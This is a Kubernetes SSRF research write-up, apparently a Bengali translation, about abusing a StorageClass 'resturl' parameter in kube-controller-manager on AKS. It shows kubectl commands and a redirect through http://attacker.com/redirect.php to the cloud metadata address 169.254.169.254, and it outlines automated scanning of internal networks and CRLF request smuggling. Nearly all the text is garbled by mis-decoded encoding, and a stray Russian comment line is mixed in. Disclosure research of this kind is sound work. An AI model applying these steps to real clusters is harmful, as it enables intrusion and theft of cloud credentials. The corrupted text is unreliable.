āĻ¤āĻžāĻ°āĻĒāĻ°ā§ āĻāĻŽāĻ°āĻž āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ° āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§āĻāĻžāĻŦā§ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻž āĻāĻ°āĻ¤ā§ āĻŦāĻžāĻāĻ¨āĻžāĻ°āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋ āĻā§āĻŦā§āĻā§āĻā§āĻ˛. āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤, āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ°āĻž (Azure, Google, AWS, āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋ) āĻāĻĒāĻ¨āĻžāĻā§ āĻāĻ āĻāĻāĻāĻŋāĻ˛āĻŋāĻāĻŋāĻ¤ā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻāĻ°āĻžāĻ° āĻ āĻ¨ā§āĻŽāĻ¤āĻŋ āĻĻā§āĻ¯āĻŧāĨ¤
āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻ§āĻ¨ā§āĻ¯āĻŦāĻžāĻĻ, āĻāĻŽāĻŋ āĻāĻŽāĻžāĻ° "āĻŦāĻŋāĻļā§āĻˇ" āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋāĨ¤ āĻā§āĻŦā§-āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ°-āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° āĻĢāĻ˛āĻ¸ā§āĻŦāĻ°ā§āĻĒ HTTP āĻ āĻ¨ā§āĻ°ā§āĻ§āĻāĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°ā§āĻā§:
kubectl create -f sc-poc.yaml
āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻĻā§āĻˇā§āĻāĻŋāĻā§āĻŖ āĻĨā§āĻā§ āĻāĻ¤ā§āĻ¤āĻ°
āĻāĻ° āĻāĻŋāĻā§āĻā§āĻˇāĻŖ āĻĒāĻ°ā§, āĻāĻŽāĻ°āĻž āĻ˛āĻā§āĻˇā§āĻ¯ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĨā§āĻā§ - āĻāĻŽāĻžāĻ¨ā§āĻĄā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻāĻāĻŋ HTTP āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻĒā§āĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋ describe pvc
āĻŦāĻž get events
kubectl-āĻāĨ¤ āĻāĻŦāĻ āĻĒā§āĻ°āĻā§āĻ¤āĻĒāĻā§āĻˇā§: āĻāĻ āĻĄāĻŋāĻĢāĻ˛ā§āĻ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻĄā§āĻ°āĻžāĻāĻāĻžāĻ°āĻāĻŋ āĻ¤āĻžāĻ° āĻ¸āĻ¤āĻ°ā§āĻāĻ¤āĻž/āĻ¤ā§āĻ°ā§āĻāĻŋ āĻŦāĻžāĻ°ā§āĻ¤āĻžāĻā§āĻ˛āĻŋāĻ¤ā§ āĻā§āĻŦ āĻŦā§āĻļāĻŋ āĻļāĻŦā§āĻĻāĻ¯ā§āĻā§āĻ¤...
āĻāĻāĻžāĻ¨ā§ āĻāĻāĻāĻŋ āĻ˛āĻŋāĻā§āĻ āĻ¸āĻš āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ https://www.google.fr
āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻ¸ā§āĻ āĻāĻ°ā§āĻ¨ resturl
:
kubectl describe pvc poc-ssrf
# иĐģи ĐļĐĩ ĐŧĐžĐļĐĩŅĐĩ вОŅĐŋĐžĐģŅСОваŅŅŅŅ kubectl get events
āĻāĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻ¤ā§, āĻāĻŽāĻ°āĻž āĻ¯ā§āĻŽāĻ¨ āĻĒā§āĻ°āĻļā§āĻ¨ā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻ¸ā§āĻŽāĻžāĻŦāĻĻā§āĻ§ āĻāĻŋāĻ˛āĻžāĻŽ HTTP āĻĒā§āĻ¸ā§āĻ āĻāĻŦāĻ āĻ°āĻŋāĻāĻžāĻ°ā§āĻ¨ āĻā§āĻĄ āĻšāĻ˛ā§ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦāĻĄāĻŋāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻĒā§āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻ¨āĻž 201. āĻ
āĻ¤āĻāĻŦ, āĻāĻŽāĻ°āĻž āĻ
āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻāĻŦā§āĻˇāĻŖāĻž āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻž āĻāĻ°āĻžāĻ° āĻ¸āĻŋāĻĻā§āĻ§āĻžāĻ¨ā§āĻ¤ āĻ¨āĻŋāĻ¯āĻŧā§āĻāĻŋ āĻāĻŦāĻ āĻ¨āĻ¤ā§āĻ¨ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻ° āĻ¸āĻžāĻĨā§ āĻāĻ āĻšā§āĻ¯āĻžāĻāĻŋāĻ āĻĻā§āĻļā§āĻ¯āĻā§ āĻĒā§āĻ°āĻ¸āĻžāĻ°āĻŋāĻ¤ āĻāĻ°ā§āĻāĻŋāĨ¤
āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻŦā§āĻˇāĻŖāĻžāĻ° āĻŦāĻŋāĻŦāĻ°ā§āĻ¤āĻ¨
- āĻāĻ¨ā§āĻ¨āĻ¤ āĻĻā§āĻļā§āĻ¯ #1: āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻĄā§āĻāĻž āĻ¸āĻāĻā§āĻ°āĻšā§āĻ° āĻāĻ°āĻ āĻ¨āĻŽāĻ¨ā§āĻ¯āĻŧ āĻāĻĒāĻžāĻ¯āĻŧ āĻĒā§āĻ°āĻĻāĻžāĻ¨ āĻāĻ°āĻ¤ā§ HTTP āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°āĻ¤ā§ āĻāĻāĻāĻŋ āĻŦāĻšāĻŋāĻ°āĻžāĻāĻ¤ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĨā§āĻā§ 302 āĻĒā§āĻ¨āĻāĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĨ¤
- āĻāĻ¨ā§āĻ¨āĻ¤ āĻĻā§āĻļā§āĻ¯ #2: āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧ āĻ˛ā§āĻ¯āĻžāĻ¨ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨āĻŋāĻ āĻāĻŦāĻ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻ¸āĻŽā§āĻĒāĻĻ āĻāĻŦāĻŋāĻˇā§āĻāĻžāĻ°āĨ¤
- āĻāĻ¨ā§āĻ¨āĻ¤ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋ #3: HTTP CRLF + āĻā§āĻ°āĻžāĻāĻžāĻ˛āĻžāĻ¨ ("āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻā§āĻ°āĻžāĻāĻžāĻ˛āĻžāĻ¨") āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻŽāĻžāĻ¨āĻžāĻ¨āĻ¸āĻ HTTP āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž āĻāĻŦāĻ kube-āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ° āĻ˛āĻ āĻĨā§āĻā§ āĻŦā§āĻ° āĻāĻ°āĻž āĻĄā§āĻāĻž āĻĒā§āĻ¨āĻ°ā§āĻĻā§āĻ§āĻžāĻ° āĻāĻ°āĻžāĨ¤
āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻāĻ¤ āĻŦāĻŋāĻŦāĻ°āĻŖ
- āĻāĻŦā§āĻˇāĻŖāĻžāĻāĻŋ āĻāĻ¤ā§āĻ¤āĻ° āĻāĻāĻ°ā§āĻĒ āĻ āĻā§āĻāĻ˛ā§ Kubernetes āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖ 1.12 āĻ¸āĻš Azure Kubernetes Service (AKS) āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻā§āĨ¤
- āĻāĻĒāĻ°ā§ āĻŦāĻ°ā§āĻŖāĻŋāĻ¤ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋāĻā§āĻ˛āĻŋ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ā§āĻ° āĻ¸āĻ°ā§āĻŦāĻļā§āĻˇ āĻ°āĻŋāĻ˛āĻŋāĻā§ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛, āĻ¤ā§āĻ¤ā§āĻ¯āĻŧ āĻĻā§āĻļā§āĻ¯āĻāĻŋ āĻŦāĻžāĻĻ āĻĻāĻŋāĻ¯āĻŧā§, āĻāĻžāĻ°āĻŖ āĻ¤āĻžāĻ° āĻĻāĻ°āĻāĻžāĻ° āĻā§āĻ˛āĻ āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖ ⤠1.12 āĻĻāĻŋāĻ¯āĻŧā§ āĻ¨āĻŋāĻ°ā§āĻŽāĻŋāĻ¤ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸āĨ¤
- āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻŦāĻžāĻšā§āĻ¯āĻŋāĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° -
https://attacker.com
.
āĻāĻ¨ā§āĻ¨āĻ¤ āĻĻā§āĻļā§āĻ¯āĻāĻ˛ā§āĻĒ #1: āĻāĻāĻāĻŋ HTTP POST āĻ āĻ¨ā§āĻ°ā§āĻ§ GET-āĻ āĻĒā§āĻ¨āĻāĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°āĻž āĻāĻŦāĻ āĻ¸āĻāĻŦā§āĻĻāĻ¨āĻļā§āĻ˛ āĻĄā§āĻāĻž āĻā§āĻ°āĻšāĻŖ āĻāĻ°āĻž
āĻāĻ¸āĻ˛ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻāĻŋ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ°ā§āĻļāĻ¨ā§āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻĢāĻŋāĻ°ā§ āĻāĻ¸āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻ¨ā§āĻ¨āĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ 302 HTTP āĻ°āĻŋāĻā§āĻĄāĻāĻāĻāĻŋ POST āĻ āĻ¨ā§āĻ°ā§āĻ§āĻā§ āĻāĻāĻāĻŋ GET āĻ āĻ¨ā§āĻ°ā§āĻ§ā§ āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°āĻ¤ā§ (āĻāĻŋāĻ¤ā§āĻ°ā§ āĻ§āĻžāĻĒ 4):
āĻĒā§āĻ°āĻĨāĻŽ āĻ
āĻ¨ā§āĻ°ā§āĻ§ (3) āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻ āĻĨā§āĻā§ āĻāĻ¸āĻā§ āĻā§āĻ˛āĻ¸ā§āĻāĻžāĻ°āĻāĻĢāĻāĻ¸ (āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ° āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ°), āĻāĻāĻāĻŋ POST āĻĒā§āĻ°āĻāĻžāĻ° āĻāĻā§āĨ¤ āĻāĻ āĻĒāĻĻāĻā§āĻˇā§āĻĒāĻā§āĻ˛āĻŋ āĻ
āĻ¨ā§āĻ¸āĻ°āĻŖ āĻāĻ°ā§ āĻāĻŽāĻ°āĻž āĻāĻāĻŋāĻā§ āĻāĻāĻāĻŋ GET-āĻ āĻĒāĻ°āĻŋāĻŖāĻ¤ āĻāĻ°āĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋ:
- āĻāĻāĻāĻŋ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻšāĻŋāĻ¸āĻžāĻŦā§
resturl
āĻ¸ā§āĻā§āĻ°ā§āĻāĻā§āĻ˛āĻžāĻ¸ā§ āĻāĻāĻŋ āĻ¨āĻŋāĻ°ā§āĻĻā§āĻļāĻŋāĻ¤ āĻšāĻ¯āĻŧhttp://attacker.com/redirect.php
. - āĻļā§āĻˇāĻĒā§āĻ°āĻžāĻ¨ā§āĻ¤
https://attacker.com/redirect.php
āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻ āĻŦāĻ¸ā§āĻĨāĻžāĻ¨ āĻļāĻŋāĻ°ā§āĻ¨āĻžāĻŽ āĻ¸āĻš āĻāĻāĻāĻŋ 302 HTTP āĻ¸ā§āĻā§āĻ¯āĻžāĻāĻžāĻ¸ āĻā§āĻĄ āĻ¸āĻš āĻāĻ¤ā§āĻ¤āĻ° āĻĻā§āĻ¯āĻŧ:http://169.254.169.254
. āĻāĻāĻŋ āĻ āĻ¨ā§āĻ¯ āĻā§āĻ¨āĻ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻ¸āĻāĻ¸ā§āĻĨāĻžāĻ¨ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§ - āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§, āĻĒā§āĻ¨āĻāĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻ˛āĻŋāĻā§āĻāĻāĻŋ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧāĨ¤ - āĻĄāĻŋāĻĢāĻ˛ā§āĻāĻ°ā§āĻĒā§ āĻ¨ā§āĻ/http āĻ˛āĻžāĻāĻŦā§āĻ°ā§āĻ°āĻŋ Golang āĻ āĻ¨ā§āĻ°ā§āĻ§āĻāĻŋ āĻĒā§āĻ¨āĻāĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°ā§ āĻāĻŦāĻ 302 āĻ¸ā§āĻā§āĻ¯āĻžāĻāĻžāĻ¸ āĻā§āĻĄ āĻ¸āĻš āĻāĻāĻāĻŋ GET-āĻ POST āĻ°ā§āĻĒāĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°ā§, āĻ¯āĻžāĻ° āĻĢāĻ˛ā§ āĻ˛āĻā§āĻˇā§āĻ¯ āĻ¸āĻāĻ¸ā§āĻĨāĻžāĻ¨ā§ āĻāĻāĻāĻŋ HTTP GET āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻ¸ā§ā§ˇ
HTTP āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦāĻĄāĻŋ āĻĒāĻĄāĻŧāĻ¤ā§ āĻāĻĒāĻ¨āĻžāĻā§ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§ describe
āĻĒāĻŋāĻāĻŋāĻ¸āĻŋ āĻŦāĻ¸ā§āĻ¤ā§:
kubectl describe pvc xxx
āĻāĻāĻžāĻ¨ā§ JSON āĻĢāĻ°ā§āĻŽā§āĻ¯āĻžāĻā§ āĻāĻāĻāĻŋ HTTP āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻ°āĻ¯āĻŧā§āĻā§ āĻ¯āĻž āĻāĻŽāĻ°āĻž āĻĒā§āĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋ:
āĻ¸ā§āĻ āĻ¸āĻŽāĻ¯āĻŧā§ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻžāĻ° āĻā§āĻˇāĻŽāĻ¤āĻž āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻŦāĻŋāĻˇāĻ¯āĻŧāĻā§āĻ˛āĻŋāĻ° āĻāĻžāĻ°āĻŖā§ āĻ¸ā§āĻŽāĻŋāĻ¤ āĻāĻŋāĻ˛:
- āĻŦāĻšāĻŋāĻ°ā§āĻāĻžāĻŽā§ āĻ āĻ¨ā§āĻ°ā§āĻ§ā§ HTTP āĻļāĻŋāĻ°ā§āĻ¨āĻžāĻŽ āĻ¸āĻ¨ā§āĻ¨āĻŋāĻŦā§āĻļ āĻāĻ°āĻžāĻ¤ā§ āĻ āĻā§āĻˇāĻŽāĻ¤āĻžāĨ¤
- āĻļāĻ°ā§āĻ°ā§ āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋ āĻ¸āĻš āĻāĻāĻāĻŋ POST āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻ¨ āĻāĻ°āĻ¤ā§ āĻ āĻā§āĻˇāĻŽāĻ¤āĻž (āĻāĻāĻŋ āĻāĻžāĻ˛ā§ āĻĨāĻžāĻāĻž āĻāĻāĻāĻŋ etcd āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻĨā§āĻā§ āĻā§ āĻŽāĻžāĻ¨ āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻ°āĻž āĻ¸ā§āĻŦāĻŋāĻ§āĻžāĻāĻ¨āĻ 2379 āĻĒā§āĻ°ā§āĻ āĻ¯āĻĻāĻŋ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻ¨āĻž āĻāĻ°āĻž HTTP āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧ)āĨ¤
- āĻ¸ā§āĻā§āĻ¯āĻžāĻāĻžāĻ¸ āĻā§āĻĄ 200 āĻšāĻ˛ā§ āĻāĻŦāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¤ā§ JSON āĻāĻ¨ā§āĻā§āĻ¨ā§āĻ-āĻāĻžāĻāĻĒ āĻ¨āĻž āĻĨāĻžāĻāĻ˛ā§ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦāĻĄāĻŋ āĻāĻ¨ā§āĻā§āĻ¨ā§āĻ āĻĒā§āĻ¨āĻ°ā§āĻĻā§āĻ§āĻžāĻ° āĻāĻ°āĻ¤ā§ āĻ āĻā§āĻˇāĻŽāĻ¤āĻžāĨ¤
āĻāĻ¨ā§āĻ¨āĻ¤ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋ #2: āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻž āĻšāĻā§āĻā§
āĻāĻ āĻ āĻ°ā§āĻ§-āĻ āĻ¨ā§āĻ§ SSRF āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻāĻŋ āĻ¤āĻāĻ¨ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻ¤ā§ āĻāĻŦāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻā§āĻ˛āĻŋāĻ° āĻāĻĒāĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋ āĻāĻ°ā§ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻļā§āĻ°āĻŦāĻŖ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž (āĻŽā§āĻāĻžāĻĄā§āĻāĻž āĻāĻĻāĻžāĻšāĻ°āĻŖ, āĻā§āĻŦā§āĻ˛ā§āĻ, āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋ) āĻĒā§āĻ˛ āĻāĻ°āĻ¤ā§ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻā§āĻŦ āĻ¨āĻŋāĻ¯āĻŧāĻžāĻŽāĻ.
āĻĒā§āĻ°āĻĨāĻŽā§, Kubernetes āĻāĻĒāĻžāĻĻāĻžāĻ¨āĻā§āĻ˛āĻŋāĻ° āĻŽāĻžāĻ¨āĻ āĻļā§āĻ¨āĻžāĻ° āĻĒā§āĻ°ā§āĻāĻā§āĻ˛āĻŋ āĻ¨āĻŋāĻ°ā§āĻ§āĻžāĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ (8443, 10250, 10251, āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋ), āĻāĻŦāĻ āĻ¤āĻžāĻ°āĻĒāĻ°ā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨āĻŋāĻ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻŋ āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧ āĻāĻ°āĻ¤ā§ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤
āĻ°āĻŋāĻ¸ā§āĻ°ā§āĻ¸ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻžāĻ° āĻāĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻāĻŋ āĻā§āĻŦāĻ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻŦāĻ āĻā§āĻ˛āĻžāĻ¸āĻŋāĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨āĻžāĻ° āĻāĻŦāĻ āĻāĻ¸āĻāĻ¸āĻāĻ°āĻāĻĢ āĻā§āĻ˛ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻžāĻŽāĻā§āĻāĻ¸ā§āĻ¯āĻĒā§āĻ°ā§āĻŖ āĻ¨āĻ¯āĻŧ āĻĻā§āĻā§ āĻāĻŽāĻ°āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻ¨āĻŋāĻāĻ¸ā§āĻŦ āĻāĻ°ā§āĻŽā§āĻĻā§āĻ° āĻāĻāĻāĻŋ āĻŦā§āĻ¯āĻžāĻļ āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻā§ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻžāĻ° āĻ¸āĻŋāĻĻā§āĻ§āĻžāĻ¨ā§āĻ¤ āĻ¨āĻŋāĻ¯āĻŧā§āĻāĻŋ āĻ¯āĻž āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻŋāĻā§ āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧ āĻāĻ°ā§āĨ¤
āĻāĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§āĻĒ, āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§āĻ° 172.16.0.0/12 āĻĒāĻ°āĻŋāĻ¸āĻ°āĻāĻŋ āĻĻā§āĻ°ā§āĻ¤ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯, 15 āĻāĻ¨ āĻāĻ°ā§āĻŽā§ āĻ¸āĻŽāĻžāĻ¨ā§āĻ¤āĻ°āĻžāĻ˛āĻāĻžāĻŦā§ āĻāĻžāĻ˛ā§ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻĒāĻ°ā§āĻ° āĻāĻāĻĒāĻŋ āĻĒāĻ°āĻŋāĻ¸āĻ°āĻāĻŋ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§ āĻāĻŦāĻ āĻāĻĒāĻ¨āĻžāĻ° āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻāĻāĻĒāĻŋ āĻĒāĻ°āĻŋāĻ¸āĻ°ā§ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻāĻāĻāĻŋ āĻāĻāĻĒāĻŋ āĻ āĻŋāĻāĻžāĻ¨āĻž āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻĒā§āĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻ¤ā§, āĻāĻĒāĻ¨āĻžāĻā§ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤āĻā§āĻ˛āĻŋ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§:
- āĻļā§āĻˇ āĻā§āĻ āĻāĻ°āĻž StorageClass āĻŽā§āĻā§āĻ¨;
- āĻĒā§āĻ°ā§āĻŦāĻŦāĻ°ā§āĻ¤ā§ āĻ¯āĻžāĻāĻžāĻāĻā§āĻ¤ āĻ¸ā§āĻĨāĻžāĻ¯āĻŧā§ āĻāĻ˛āĻŋāĻāĻŽ āĻĻāĻžāĻŦāĻŋ āĻ¸āĻ°āĻžāĻ¨;
- āĻāĻāĻĒāĻŋ āĻāĻŦāĻ āĻĒā§āĻ°ā§āĻā§āĻ° āĻŽāĻžāĻ¨ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°ā§āĻ¨
sc.yaml
; - āĻāĻāĻāĻŋ āĻ¨āĻ¤ā§āĻ¨ āĻāĻāĻĒāĻŋ āĻāĻŦāĻ āĻĒā§āĻ°ā§āĻ āĻ¸āĻš āĻāĻāĻāĻŋ āĻ¸ā§āĻā§āĻ°ā§āĻāĻā§āĻ˛āĻžāĻ¸ āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§āĻ¨;
- āĻāĻāĻāĻŋ āĻ¨āĻ¤ā§āĻ¨ āĻĒāĻŋāĻāĻŋāĻ¸āĻŋ āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§āĻ¨;
